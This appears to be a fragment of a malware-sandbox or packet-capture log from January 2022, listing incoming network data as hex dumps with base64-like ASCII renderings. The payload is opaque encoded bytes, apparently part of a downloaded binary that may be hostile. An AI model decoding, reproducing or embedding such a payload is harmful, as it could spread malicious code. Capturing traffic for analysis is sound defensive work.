2022-01-30 12:44:51 UTC	2337	IN	Data Raw: 6c 41 41 41 41 41 4c 4b 34 4a 41 41 50 36 4c 34 57 0d 0a 62 46 69 30 42 4a 51 79 56 30 35 58 7a 30 55 49 69 55 58 67 69 30 66 67 69 55 33 58 69 31 58 67 37 69 4a 6e 55 52 6f 37 6b 41 75 4c 51 77 41 41 41 4f 73 48 78 30 2f 63 41 41 41 50 41 49 70 46 0d 0a 73 64 41 32 73 6d 65 45 47 72 33 53 69 33 51 4f 69 31 58 67 69 77 69 4a 52 62 69 45 54 62 69 4a 49 49 44 34 46 4c 43 37 41 76 72 63 42 37 53 4a 52 62 42 71 52 47 41 41 6a 59 31 44 2f 2f 2f 2f 0d 0a 50 4c 43 5a 35 70 66 4e 50 56 34 39 51 6f 31 56 6b 46 4c 6f 33 61 33 2f 2f 7a 50 50 69 45 58 79 34 42 57 42 71 53 69 58 71 62 48 65 42 39 53 4c 54 64 54 6f 78 64 4c 2f 2f 32 67 50 49 41 41 41 0d 0a 34 4e 56 50 6d 70 66 4e 42 73 55 43 6c 6c 4a 71 41 47 67 6f 63 41 77 51 36 48 6e 78 2f 66 2f 2f 76 57 75 7a 79 53 Data Ascii: lAAAAALK4JAAP6L4WbFi0BJQyV05Xz0UIiUXgi0fgiU3Xi1Xg7iJnURo7kAuLQwAAAOsHx0/cAAAPAIpFsdA2smeEGr3Si3QOi1XgiwiJRbiETbiJIID4FLC7AvrcB7SJRbBqRGAAjY1D////PLCZ5pfNPV49Qo1VkFLo3a3//zPPiEXy4BWBqSiXqbHeB9SLTdToxdL//2gPIAAA4NVPmpfNBsUCllJqAGgocAwQ6Hnx/f//vWuzyS
2022-01-30 12:44:51 UTC	2353	IN	Data Raw: 4e 0d 0a 6d 54 7a 36 54 47 67 79 56 30 37 63 70 31 33 43 43 41 42 6d 6b 46 45 75 41 78 43 35 4c 67 4d 51 65 6e 64 77 55 52 41 64 56 46 36 4f 62 51 4d 51 4f 6a 41 44 45 4a 45 77 41 78 44 7a 4d 41 4d 51 0d 0a 62 56 6c 78 52 6d 73 32 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 32 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 0d 0a 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 73 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 6e 77 65 77 49 33 55 55 49 33 52 59 6b 36 4e 6b 6e 41 51 43 44 71 56 44 72 78 4b 68 4e 58 6f 6b 53 74 67 45 41 41 41 44 72 42 38 Data Ascii: NmTz6TGgyV07cp13CCABmkFEuAxC5LgMQendwURAdVF6ObQMQOjADEJEwAxDzMAMQbVlxRms2UElQRQcHBwcHBw0HBwcIBwcHal92Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBszMzMbMzMzDzMzMONOfwoQq3gOnwewI3UUI3RYk6NknAQCDqVDrxKhNXokStgEAAADrB8
2022-01-30 12:44:51 UTC	2369	IN	Data Raw: 6f 6c 4e 31 49 74 56 31 46 69 4e 6a 59 54 30 2f 2f 2f 6f 61 65 43 50 76 75 57 33 30 37 57 6f 76 59 6d 46 6c 50 76 2f 2f 38 79 46 6d 50 76 77 2f 77 48 47 0d 0a 4b 4b 52 35 7a 4f 56 65 72 4c 47 6f 79 34 30 30 2f 2f 2f 2f 6a 5a 2b 63 2b 2f 2f 77 69 5a 55 34 6b 71 65 4d 79 75 30 47 71 4c 47 6f 79 59 30 34 2f 2f 2f 2f 69 59 38 73 2f 2f 2f 77 69 59 30 77 0d 0a 6b 71 65 4d 4b 32 70 59 56 73 58 43 63 76 2f 2f 2f 31 4b 4c 68 53 62 2f 2f 2f 39 66 6a 59 32 77 6c 4b 65 4d 71 59 6a 75 71 72 48 61 7a 37 44 35 2f 2f 2b 4a 6a 63 72 35 2f 2f 2f 4a 68 63 54 35 0d 0a 6b 71 64 79 68 79 33 4f 58 49 6b 53 6b 74 69 65 42 78 43 4c 56 64 70 53 6a 59 32 76 2b 2f 2f 2f 68 63 76 46 76 5a 65 2f 30 75 36 73 76 66 2b 4a 68 62 44 37 2f 2f 58 47 68 62 54 30 2f 2f 38 42 0d 0a 71 78 32 50 Data Ascii: olN1ItV1FiNjYT0///oaeCPvuW307WovYmFlPv//8yFmPvw/wHGKKR5zOVerLGoy400////jZ+c+//wiZU4kqeMyu0GqLGoyY04////iY8s///wiY0wkqeMK2pYVsXCcv///1KLhSb///9fjY2wlKeMqYjuqrHaz7D5//+Jjcr5///JhcT5kqdyhy3OXIkSktieBxCLVdpSjY2v+///hcvFvZe/0u6svf+JhbD7//XGhbT0//8Bqx2P
2022-01-30 12:44:51 UTC	2385	IN	Data Raw: 76 2f 2f 35 74 31 6e 76 35 66 4e 33 4d 4e 50 76 50 2f 2f 69 59 55 4d 2f 76 58 2f 69 59 30 66 2f 76 2f 2f 0d 0a 42 31 6f 5a 51 4f 4f 6e 52 37 43 6f 76 56 4b 4c 68 51 7a 2b 2f 2f 56 51 6a 59 30 62 2b 76 2f 2f 68 63 76 64 76 4a 65 2f 32 6c 71 74 76 66 2b 4a 6a 53 54 36 2f 2f 58 47 68 53 6a 31 2f 2f 38 42 0d 0a 71 78 32 50 55 71 2b 33 57 37 47 6f 76 64 69 65 42 78 43 4c 6c 51 62 2f 2f 2f 39 64 6a 59 30 6f 6c 71 65 4d 71 53 69 36 71 37 48 61 78 79 6a 37 2f 2f 2b 4a 68 54 4c 37 2f 2f 2f 4a 68 54 7a 37 0d 0a 6b 71 64 79 68 79 33 4f 51 38 32 37 57 6f 76 4d 69 61 56 77 2f 50 58 2f 69 55 32 58 6a 56 56 4d 35 4d 31 37 76 70 66 4e 33 4d 74 66 76 66 2f 2f 69 59 56 73 2f 50 58 2f 6a 55 33 54 55 51 2b 32 0d 0a 4f 49 4d 68 79 69 57 71 76 78 76 47 76 76 2f 47 52 66 77 56 Data Ascii: v//5t1nv5fN3MNPvP//iYUM/vX/iY0f/v//B1oZQOOnR7CovVKLhQz+//VQjY0b+v//hcvdvJe/2lqtvf+JjST6//XGhSj1//8Bqx2PUq+3W7GovdieBxCLlQb///9djY0olqeMqSi6q7Haxyj7//+JhTL7///JhTz7kqdyhy3OQ827WovMiaVw/PX/iU2XjVVM5M17vpfN3Mtfvf//iYVs/PX/jU3TUQ+2OIMhyiWqvxvGvv/GRfwV
2022-01-30 12:44:51 UTC	2401	IN	Data Raw: 55 32 38 55 59 32 56 56 50 62 2f 2f 31 4a 6c 41 47 67 4d 0d 0a 48 56 35 6a 71 53 41 4f 71 72 47 6f 6b 6d 6f 42 6a 59 30 34 2f 76 58 2f 36 4a 6d 66 2f 66 2f 47 4b 4b 52 33 63 71 69 36 45 71 54 61 44 2b 72 6f 32 44 4c 2b 2f 34 4e 46 75 49 74 43 75 4f 68 74 0d 0a 66 61 65 4d 79 69 57 4b 42 73 58 43 4f 76 2f 2f 2f 31 4b 4e 52 53 35 51 69 34 31 37 2f 2f 2f 2f 50 4e 58 6d 43 5a 62 4e 71 42 79 2f 69 57 62 38 2f 31 44 6f 52 57 7a 38 2f 31 44 6e 76 32 62 38 0d 0a 6b 67 69 62 2b 41 37 4f 71 48 32 58 79 6b 58 70 6a 55 33 70 36 42 59 6c 2f 76 2b 47 52 62 53 4c 49 4f 79 62 59 47 66 4e 71 4d 55 61 39 6c 47 4e 6c 56 54 38 2f 2f 56 53 6a 59 56 48 2f 76 2f 2f 0d 0a 50 62 44 35 4a 35 54 4e 42 36 62 54 4a 50 7a 2f 4d 38 6d 49 54 65 4b 4e 54 65 6a 6e 6c 2f 44 39 6b 74 45 32 Data Ascii: U28UY2VVPb//1JlAGgMHV5jqSAOqrGokmoBjY04/vX/6Jmf/f/GKKR3cqi6EqTaD+ro2DL+/4NFuItCuOhtfaeMyiWKBsXCOv///1KNRS5Qi417////PNXmCZbNqBy/iWb8/1DoRWz8/1Dnv2b8kgib+A7OqH2XykXpjU3p6BYl/v+GRbSLIOybYGfNqMUa9lGNlVT8//VSjYVH/v//PbD5J5TNB6bTJPz/M8mITeKNTejnl/D9ktE2
2022-01-30 12:44:51 UTC	2417	IN	Data Raw: 67 59 51 0d 0a 68 53 32 62 51 57 69 78 6b 30 4c 63 46 2f 79 4c 41 6f 6f 49 69 45 66 34 67 48 33 33 41 41 2b 45 37 56 68 7a 51 65 68 50 72 30 38 6a 53 6f 42 39 2b 41 4a 30 50 4f 46 2b 69 31 58 7a 69 77 4b 4c 0d 0a 4a 56 44 36 44 4a 69 35 41 72 37 65 46 2b 79 4c 52 65 79 4a 52 65 4b 4c 54 65 69 45 45 59 73 43 35 42 32 58 79 69 58 57 33 67 4f 33 7a 31 58 67 69 56 58 63 69 30 2f 63 69 77 69 45 56 66 79 4a 0d 0a 4a 31 79 59 44 2b 4e 33 71 38 56 66 79 56 45 49 69 56 58 59 69 30 2f 59 69 55 58 37 69 30 33 30 35 42 57 37 79 6a 33 47 33 45 7a 65 42 39 53 4c 54 64 53 4a 54 64 71 4e 56 64 43 47 56 63 79 4c 0d 0a 4b 4a 54 34 53 65 4e 6e 71 38 63 64 53 75 73 57 69 30 58 38 78 30 6f 4d 41 51 41 50 41 4f 73 4b 35 68 57 50 68 69 6b 2b 56 30 35 58 51 6f 76 6c 58 63 50 4d Data Ascii: gYQhS2bQWixk0LcF/yLAooIiEf4gH33AA+E7VhzQehPr08jSoB9+AJ0POF+i1XziwKLJVD6DJi5Ar7eF+yLReyJReKLTeiEEYsC5B2XyiXW3gO3z1XgiVXci0/ciwiEVfyJJ1yYD+N3q8VfyVEIiVXYi0/YiUX7i0305BW7yj3G3EzeB9SLTdSJTdqNVdCGVcyLKJT4SeNnq8cdSusWi0X8x0oMAQAPAOsK5hWPhik+V05XQovlXcPM
2022-01-30 12:44:51 UTC	2433	IN	Data Raw: 58 30 77 59 51 38 67 39 59 77 63 6e 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 4c 55 66 35 79 74 42 78 41 47 66 42 76 46 2b 57 37 4f 78 4f 4e 35 0d 0a 54 35 70 79 49 35 6e 4d 58 36 69 58 67 51 39 58 79 66 49 50 4b 73 41 50 56 38 44 39 44 79 72 42 72 4c 46 73 73 32 64 72 57 6b 37 47 52 42 44 79 44 31 67 45 7a 66 4b 51 42 68 44 39 44 31 6a 42 0d 0a 72 67 33 34 72 5a 35 33 58 30 38 42 79 66 48 48 42 67 79 52 42 68 70 30 43 6d 6f 44 56 75 68 72 6c 36 65 4d 47 44 47 35 6b 52 41 4b 67 41 51 41 56 59 76 73 69 30 38 4d 67 2b 67 50 64 44 4f 44 0d 0a 68 56 6b 48 59 65 76 61 56 6a 70 47 77 65 67 42 64 41 55 7a 77 45 72 72 4d 4f 67 6e 2b 2f 2f 2f 68 6c 32 62 51 35 50 4e 71 45 48 68 67 75 73 66 2f 33 55 51 2f 33 38 49 36 42 67 50 41 41 42 5a 0d 0a 68 6b Data Ascii: X0wYQ8g9YwcnMzMzDzMzMoZS/jaT+m4LUf5ytBxAGfBvF+W7OxON5T5pyI5nMX6iXgQ9XyfIPKsAPV8D9DyrBrLFss2drWk7GRBDyD1gEzfKQBhD9D1jBrg34rZ53X08ByfHHBgyRBhp0CmoDVuhrl6eMGDG5kRAKgAQAVYvsi08Mg+gPdDODhVkHYevaVjpGwegBdAUzwErrMOgn+///hl2bQ5PNqEHhgusf/3UQ/38I6BgPAABZhk
2022-01-30 12:44:51 UTC	2449	IN	Data Raw: 4b 77 48 55 43 35 70 2b 4d 4e 47 42 69 76 2b 4f 32 76 66 2b 4c 64 53 54 2f 4e 76 56 31 47 50 39 36 46 46 66 6f 0d 0a 44 31 46 7a 51 65 4e 30 55 77 34 48 76 58 55 59 56 2b 69 7a 44 77 6f 41 61 41 41 4f 41 41 44 2f 47 48 43 4d 4d 6d 54 4e 49 6c 61 6f 4e 78 42 58 2f 33 55 49 36 4e 38 47 41 41 43 4d 78 44 69 46 0d 0a 72 53 78 30 46 6a 6a 61 59 61 2b 6f 76 56 39 65 57 31 33 44 56 59 48 73 67 2b 78 72 55 31 5a 58 35 69 56 72 63 71 68 6c 71 44 74 44 79 30 58 77 2f 33 55 4d 69 45 2f 6f 36 45 6b 41 41 41 43 4c 0d 0a 70 64 75 33 54 65 46 2f 72 38 32 75 76 51 2b 4d 63 77 4d 41 41 44 46 50 42 41 2b 43 61 67 4d 41 62 64 4d 75 53 65 6b 4a 4e 44 30 36 6f 67 2b 46 39 77 41 41 41 49 6c 37 45 41 4d 41 68 65 30 41 0d 0a 62 56 6a 79 4f 6e 77 53 55 74 31 4f 4e 68 61 42 65 78 Data Ascii: KwHUC5p+MNGBiv+O2vf+LdST/NvV1GP96FFfoD1FzQeN0Uw4HvXUYV+izDwoAaAAOAAD/GHCMMmTNIlaoNxBX/3UI6N8GAACMxDiFrSx0FjjaYa+ovV9eW13DVYHsg+xrU1ZX5iVrcqhlqDtDy0Xw/3UMiE/o6EkAAACLpdu3TeF/r82uvQ+McwMAADFPBA+CagMAbdMuSekJND06og+F9wAAAIl7EAMAhe0AbVjyOnwSUt1ONhaBex
2022-01-30 12:44:51 UTC	2465	IN	Data Raw: 6f 76 51 2b 46 61 66 7a 2f 2f 34 47 4e 31 50 62 77 2f 34 58 4a 0d 0a 47 52 33 34 66 65 55 32 38 45 68 48 78 2f 38 50 68 59 67 41 41 41 6f 7a 77 46 43 47 68 64 54 30 6b 71 66 36 78 45 54 4d 71 4c 48 61 78 39 6a 30 2f 2f 39 51 6a 59 38 77 2f 76 2f 77 61 4d 77 42 0d 0a 62 56 67 6a 71 58 63 71 56 30 37 55 68 68 43 4c 6e 53 7a 2b 2f 2f 57 4a 6e 65 6a 35 2f 2f 2b 46 74 6c 66 32 72 57 67 79 56 33 32 65 71 77 55 42 41 41 41 7a 77 46 71 4a 68 64 54 37 2f 2f 2b 4a 0d 0a 36 48 53 4e 76 70 65 2f 30 70 61 6a 76 66 39 51 6a 59 55 77 2f 76 58 2f 61 4d 77 4f 41 41 42 51 68 59 4a 6b 51 57 69 78 6b 31 35 6c 67 75 6c 46 2f 2f 2f 2f 67 36 2f 55 39 50 2f 77 41 49 4f 6c 0d 0a 51 61 61 4d 76 6d 68 59 56 36 55 7a 77 66 38 42 64 4b 6d 46 32 33 36 74 4d 38 6b 38 39 6f 76 48 6d 76 Data Ascii: ovQ+Fafz//4GN1Pbw/4XJGR34feU28EhHx/8PhYgAAAozwFCGhdT0kqf6xETMqLHax9j0//9QjY8w/v/waMwBbVgjqXcqV07UhhCLnSz+//WJnej5//+Ftlf2rWgyV32eqwUBAAAzwFqJhdT7//+J6HSNvpe/0pajvf9QjYUw/vX/aMwOAABQhYJkQWixk15lgulF////g6/U9P/wAIOlQaaMvmhYV6Uzwf8BdKmF236tM8k89ovHmv
2022-01-30 12:44:51 UTC	2481	IN	Data Raw: 77 67 2f 6a 2f 0d 0a 47 56 34 31 65 68 30 69 4b 35 49 49 47 56 35 64 77 34 76 2f 56 59 48 73 56 6a 50 35 4f 58 55 51 45 30 51 6b 79 68 55 6d 33 41 4e 66 46 66 39 31 44 4f 68 38 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 46 74 43 52 4f 55 79 66 39 56 69 2b 78 57 4d 2f 77 35 64 52 42 78 49 56 4e 6d 59 75 59 75 54 54 2b 35 4b 6c 72 63 44 77 68 58 55 2b 69 4f 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 4e 74 44 42 41 4b 67 59 76 2f 56 59 76 73 55 54 6e 41 69 55 33 7a 69 51 47 4a 4c 46 7a 36 41 47 43 37 46 6b 4c 65 41 78 43 4a 51 52 53 4a 51 52 4b 4a 51 52 79 47 51 53 43 4a 0d 0a 4c 48 7a 36 41 45 42 55 33 67 39 6e 79 30 45 34 69 45 45 38 69 59 74 41 42 41 41 50 69 59 46 45 61 56 68 7a 79 71 6e 37 6c 4d 57 6f 46 34 76 73 55 54 Data Ascii: wg/j/GV41eh0iK5IIGV5dw4v/VYHsVjP5OXUQE0QkyhUm3ANfFf91DOh8IAoAgz/wdAZGVi1jPYFtCROUyf9Vi+xWM/w5dRBxIVNmYuYuTT+5KlrcDwhXU+iOIAoAgz/wdAZGVi1jPYNtDBAKgYv/VYvsUTnAiU3ziQGJLFz6AGC7FkLeAxCJQRSJQRKJQRyGQSCJLHz6AEBU3g9ny0E4iEE8iYtABAAPiYFEaVhzyqn7lMWoF4vsUT
2022-01-30 12:44:51 UTC	2497	IN	Data Raw: 44 74 62 76 58 55 49 36 41 54 2b 2f 2f 58 4d 69 2f 39 61 69 2b 79 4e 4b 45 67 6a 4b 32 6a 4e 49 6b 4b 6f 4e 77 6a 6f 54 76 2f 2f 2f 34 6e 45 45 46 33 4d 69 2f 39 56 0d 0a 35 72 54 2b 42 48 78 69 50 55 36 6f 4e 78 44 2f 64 51 7a 2f 64 51 4c 6f 56 66 2f 77 2f 34 50 45 65 51 57 77 79 70 64 6b 41 50 48 66 38 77 63 51 4d 2f 5a 71 41 47 4b 67 44 77 41 50 56 2b 6a 4b 0d 0a 43 56 68 7a 78 4b 68 47 54 37 46 53 6d 72 49 48 45 49 50 47 47 49 6e 48 47 49 48 78 55 41 45 41 62 53 71 6f 38 57 6e 5a 58 53 52 58 71 68 30 41 41 41 42 5a 4d 73 70 66 58 73 4f 45 2f 31 57 4c 0d 0a 67 54 4d 32 53 58 41 33 33 2f 39 51 55 6c 44 2f 46 52 42 67 42 68 70 64 77 34 76 77 56 6f 73 31 74 65 70 30 55 65 33 45 49 32 34 38 68 42 68 58 6a 62 68 77 73 51 30 51 56 2f 38 61 48 47 41 47 0d 0a Data Ascii: DtbvXUI6AT+//XMi/9ai+yNKEgjK2jNIkKoNwjoTv///4nEEF3Mi/9V5rT+BHxiPU6oNxD/dQz/dQLoVf/w/4PEeQWwypdkAPHf8wcQM/ZqAGKgDwAPV+jKCVhzxKhGT7FSmrIHEIPGGInHGIHxUAEAbSqo8WnZXSRXqh0AAABZMspfXsOE/1WLgTM2SXA33/9QUlD/FRBgBhpdw4vwVos1tep0Ue3EI248hBhXjbhwsQ0QV/8aHGAG
2022-01-30 12:44:51 UTC	2513	IN	Data Raw: 51 34 41 74 38 65 70 6e 53 64 7a 51 52 31 49 33 41 4e 62 79 56 55 49 39 38 48 2f 2f 77 55 41 64 51 53 4b 30 6e 52 6f 0d 0a 73 34 48 4e 51 70 54 4e 71 4a 47 33 45 54 50 62 39 73 52 42 64 51 74 44 39 6b 55 42 45 48 55 66 62 70 48 36 44 47 53 33 68 54 64 52 77 63 6b 42 69 55 30 4d 41 39 68 4f 39 6b 55 42 45 48 54 6f 0d 0a 43 39 4d 4f 54 2b 46 6e 58 2f 61 34 76 51 41 41 5a 69 50 34 68 64 45 50 74 38 64 70 69 58 30 4f 4e 69 78 36 54 47 69 79 56 30 34 78 79 30 55 4f 33 55 55 49 61 67 70 52 55 64 30 54 4a 4f 67 78 0d 0a 62 56 68 7a 77 71 77 2b 76 47 30 39 51 6c 48 64 32 46 48 64 48 43 37 6f 48 67 41 50 41 41 2b 33 6d 74 75 33 54 61 6e 63 55 38 2b 78 76 51 63 41 41 49 48 75 2f 67 6b 41 41 46 2b 45 52 52 43 4a 0d 0a 58 51 59 75 67 75 50 4e 41 73 57 37 45 31 47 4c Data Ascii: Q4At8epnSdzQR1I3ANbyVUI98H//wUAdQSK0nRos4HNQpTNqJG3ETPb9sRBdQtD9kUBEHUfbpH6DGS3hTdRwckBiU0MA9hO9kUBEHToC9MOT+FnX/a4vQAAZiP4hdEPt8dpiX0ONix6TGiyV04xy0UO3UUIagpRUd0TJOgxbVhzwqw+vG09QlHd2FHdHC7oHgAPAA+3mtu3TancU8+xvQcAAIHu/gkAAF+ERRCJXQYuguPNAsW7E1GL
2022-01-30 12:44:51 UTC	2529	IN	Data Raw: 44 70 62 77 58 34 59 2f 6e 51 47 67 45 51 6f 67 4f 74 32 69 38 66 47 0d 0a 4b 33 44 79 77 6f 41 79 49 31 37 55 71 67 46 30 42 34 50 6f 41 57 44 30 36 77 5a 6c 39 65 73 43 42 36 34 72 45 5a 63 6e 39 79 35 52 55 6f 76 59 67 2f 76 2f 64 41 65 46 32 33 51 47 55 2f 38 56 0d 0a 79 54 68 31 55 59 4d 77 5a 49 37 53 67 6e 51 63 44 37 62 41 69 56 51 59 67 2f 67 4e 64 51 61 41 49 33 41 7a 71 6b 47 78 72 30 30 69 5a 6f 42 4f 4b 41 6a 72 48 6f 70 4f 4b 45 44 49 52 68 6a 2b 0d 0a 6b 71 65 4d 34 46 79 47 55 46 37 53 67 6e 51 4b 69 77 53 34 78 30 6f 51 2f 76 2f 77 2f 30 65 44 6b 6c 74 38 78 44 2f 4e 71 4c 45 49 48 46 76 44 61 67 78 6f 2b 48 51 48 45 4f 67 50 37 66 37 2f 0d 0a 42 31 2b 62 68 4d 72 4e 71 42 64 6b 6d 59 68 64 35 34 6c 64 2f 46 6e 6f 4f 4a 51 50 41 46 6d 46 Data Ascii: DpbwX4Y/nQGgEQogOt2i8fGK3DywoAyI17UqgF0B4PoAWD06wZl9esCB64rEZcn9y5RUovYg/v/dAeF23QGU/8VyTh1UYMwZI7SgnQcD7bAiVQYg/gNdQaAI3AzqkGxr00iZoBOKAjrHopOKEDIRhj+kqeM4FyGUF7SgnQKiwS4x0oQ/v/w/0eDklt8xD/NqLEIHFvDagxo+HQHEOgP7f7/B1+bhMrNqBdkmYhd54ld/FnoOJQPAFmF
2022-01-30 12:44:51 UTC	2545	IN	Data Raw: 51 63 66 5a 67 38 6f 0d 0a 57 4f 69 2f 52 33 68 55 57 42 65 59 4a 41 39 59 30 57 59 50 63 4d 44 75 38 67 39 57 31 2f 49 50 4e 59 6d 42 54 6a 44 6d 4d 55 46 46 5a 39 44 4d 42 68 42 6d 44 32 54 4b 67 65 71 50 2f 77 45 41 0d 0a 6d 6f 4b 79 75 32 2b 78 6c 55 7a 63 67 49 50 67 49 41 50 51 5a 67 56 58 2f 37 69 50 50 77 41 41 43 31 65 33 75 57 76 41 57 42 63 44 5a 68 54 79 44 31 6e 48 5a 67 56 7a 38 53 31 70 44 33 44 4a 0d 0a 4b 54 35 38 61 56 58 79 6d 30 68 48 73 41 39 59 36 6d 59 50 57 64 50 79 44 31 6a 4b 5a 67 38 55 72 54 35 38 47 4a 6a 41 57 42 65 33 4a 41 39 5a 77 47 59 50 57 50 52 6d 44 31 6e 33 38 67 39 5a 0d 0a 72 6a 35 38 4d 5a 2f 63 70 55 45 4f 68 57 59 50 63 4f 76 75 38 67 56 5a 38 2f 49 41 57 65 4e 6d 59 6a 61 4b 4a 32 64 42 6f 47 4d 78 54 57 37 53 Data Ascii: QcfZg8oWOi/R3hUWBeYJA9Y0WYPcMDu8g9W1/IPNYmBTjDmMUFFZ9DMBhBmD2TKgeqP/wEAmoKyu2+xlUzcgIPgIAPQZgVX/7iPPwAAC1e3uWvAWBcDZhTyD1nHZgVz8S1pD3DJKT58aVXym0hHsA9Y6mYPWdPyD1jKZg8UrT58GJjAWBe3JA9ZwGYPWPRmD1n38g9Zrj58MZ/cpUEOhWYPcOvu8gVZ8/IAWeNmYjaKJ2dBoGMxTW7S
2022-01-30 12:44:51 UTC	2561	IN	Data Raw: 2b 56 30 35 58 77 53 63 41 6a 55 58 73 69 37 53 77 41 41 41 50 61 67 35 58 42 31 6b 6a 71 63 50 77 71 4c 48 61 43 51 53 4c 38 46 46 71 44 31 32 4e 52 65 78 6c 41 56 44 6f 0d 0a 2b 70 71 4d 76 6d 50 43 32 67 31 66 45 6d 6f 51 56 34 31 46 37 47 41 42 55 4f 69 4d 77 76 2f 2f 5a 71 6a 2b 41 6c 68 69 50 55 41 41 7a 30 58 73 61 67 4a 51 36 47 58 43 2f 2f 2b 4d 78 46 41 4c 0d 0a 6e 64 55 77 64 54 68 59 57 42 6e 61 42 2b 78 71 41 6c 44 6f 57 4d 6a 2f 2f 34 50 4c 46 41 76 47 47 58 49 67 71 51 72 4d 71 4c 45 45 71 70 70 32 2f 2f 2f 2f 64 66 4c 6f 6b 6e 62 77 2f 34 50 45 0d 0a 59 64 73 2b 74 5a 65 35 47 72 49 47 71 6f 4a 32 2f 2f 2b 4c 52 66 35 5a 36 33 43 45 55 77 6a 72 5a 74 55 37 6b 65 6a 4c 58 6a 6b 2f 79 67 70 43 69 67 4b 45 77 48 2f 76 69 33 33 33 69 33 55 49 Data Ascii: +V05XwScAjUXsi7SwAAAPag5XB1kjqcPwqLHaCQSL8FFqD12NRexlAVDo+pqMvmPC2g1fEmoQV41F7GABUOiMwv//Zqj+AlhiPUAAz0XsagJQ6GXC//+MxFALndUwdThYWBnaB+xqAlDoWMj//4PLFAvGGXIgqQrMqLEEqpp2////dfLoknbw/4PEYds+tZe5GrIGqoJ2//+LRf5Z63CEUwjrZtU7kejLXjk/ygpCigKEwH/vi333i3UI
2022-01-30 12:44:51 UTC	2577	IN	Data Raw: 46 79 58 52 31 67 36 57 30 6c 61 65 4d 51 56 76 4e 33 4d 72 71 63 76 37 2f 2f 32 6f 4b 57 76 33 69 41 34 57 37 2b 50 2f 2f 0d 0a 35 4e 7a 4f 63 5a 62 4e 71 4d 32 46 51 6b 65 4a 6c 62 54 34 2f 2f 55 37 2b 58 58 57 69 37 32 34 6c 61 65 4d 78 4c 70 47 46 38 58 53 62 76 37 2f 2f 34 50 34 63 33 6b 50 69 5a 53 4b 4d 50 37 2f 0d 0a 6b 71 66 32 62 5a 62 4e 71 4b 56 78 63 63 42 51 69 59 57 63 39 76 58 2f 69 59 55 6a 2f 76 2f 2f 34 4e 33 54 74 35 66 4e 42 38 50 53 63 76 37 2f 2f 31 5a 51 36 42 48 53 2f 76 2b 4d 78 42 43 4e 0d 0a 36 41 53 50 76 70 64 69 32 73 74 37 76 50 2f 2f 55 4f 68 75 7a 50 54 2f 57 56 6d 45 6a 5a 7a 34 6b 71 63 5a 53 7a 49 4a 6c 55 48 53 42 41 45 41 41 49 75 46 58 50 62 2f 2f 34 31 32 41 66 2b 46 0d 0a 2b 61 43 4d 76 71 34 7a 5a 73 66 71 2b 76 Data Ascii: FyXR1g6W0laeMQVvN3Mrqcv7//2oKWv3iA4W7+P//5NzOcZbNqM2FQkeJlbT4//U7+XXWi724laeMxLpGF8XSbv7//4P4c3kPiZSKMP7/kqf2bZbNqKVxccBQiYWc9vX/iYUj/v//4N3Tt5fNB8PScv7//1ZQ6BHS/v+MxBCN6ASPvpdi2st7vP//UOhuzPT/WVmEjZz4kqcZSzIJlUHSBAEAAIuFXPb//412Af+F+aCMvq4zZsfq+v
2022-01-30 12:44:51 UTC	2593	IN	Data Raw: 79 2f 33 45 6a 61 77 2b 33 30 43 50 57 77 65 67 45 71 41 52 37 41 34 50 4b 0d 0a 5a 66 42 37 4e 57 75 78 6e 55 72 2f 55 6e 51 44 67 38 6f 43 71 43 70 30 41 67 76 5a 71 41 4a 30 62 31 4f 6b 54 73 5a 76 72 38 55 53 75 6f 50 67 77 49 6c 46 39 41 57 75 56 66 53 45 52 66 69 6f 0d 0a 55 69 78 62 79 71 41 52 6d 59 2b 32 52 71 67 45 64 41 4f 44 79 51 4b 6f 43 48 51 4d 67 38 6b 45 78 55 67 48 51 75 76 37 56 65 5a 33 4e 67 49 4c 7a 71 67 43 64 41 67 4c 7a 77 76 46 69 38 46 66 0d 0a 68 6d 51 56 79 69 58 4f 5a 49 36 68 67 7a 39 30 4d 51 2b 33 77 53 6e 47 77 65 41 4c 39 73 45 45 47 56 76 77 69 57 44 45 6c 6b 59 6a 51 59 50 49 42 50 62 42 45 48 34 44 67 38 67 4e 39 73 45 67 0d 0a 47 56 70 34 68 35 37 7a 56 54 70 53 54 77 41 41 43 41 42 65 79 63 6d 4c 2f 31 57 45 37 49 Data Ascii: y/3Ejaw+30CPWwegEqAR7A4PKZfB7NWuxnUr/UnQDg8oCqCp0AgvZqAJ0b1OkTsZvr8USuoPgwIlF9AWuVfSERfioUixbyqARmY+2RqgEdAODyQKoCHQMg8kExUgHQuv7VeZ3NgILzqgCdAgLzwvFi8FfhmQVyiXOZI6hgz90MQ+3wSnGweAL9sEEGVvwiWDElkYjQYPIBPbBEH4Dg8gN9sEgGVp4h57zVTpSTwAACABeycmL/1WE7I
2022-01-30 12:44:51 UTC	2609	IN	Data Raw: 4c 54 62 7a 6d 76 30 2f 37 0d 0a 6b 74 50 2b 6f 5a 62 4e 71 4b 65 54 46 76 76 2f 69 30 32 34 36 61 5a 50 2b 2f 2b 43 6a 52 54 2f 6b 71 65 61 38 44 7a 4a 71 4d 58 61 68 76 37 2f 2f 2b 6d 6d 56 50 48 2f 69 30 32 37 36 59 35 50 0d 0a 6c 71 66 34 7a 4e 54 4d 71 4c 47 2b 30 56 54 37 2f 34 32 4e 48 50 54 2f 2f 2b 6d 48 56 50 76 2f 35 74 58 62 76 35 66 4e 76 6a 4d 44 75 66 2b 4c 6a 61 44 2b 2f 2f 58 70 63 6c 54 30 2f 34 32 4e 0d 0a 61 61 61 4d 76 6f 46 56 41 37 57 6f 79 59 32 51 2f 76 2f 2f 36 56 5a 55 2b 2f 2b 45 6a 59 6a 2b 6b 71 65 61 45 44 7a 4a 71 4d 50 61 72 76 33 2f 2f 2b 6c 47 56 50 48 2f 69 34 31 33 2f 76 2f 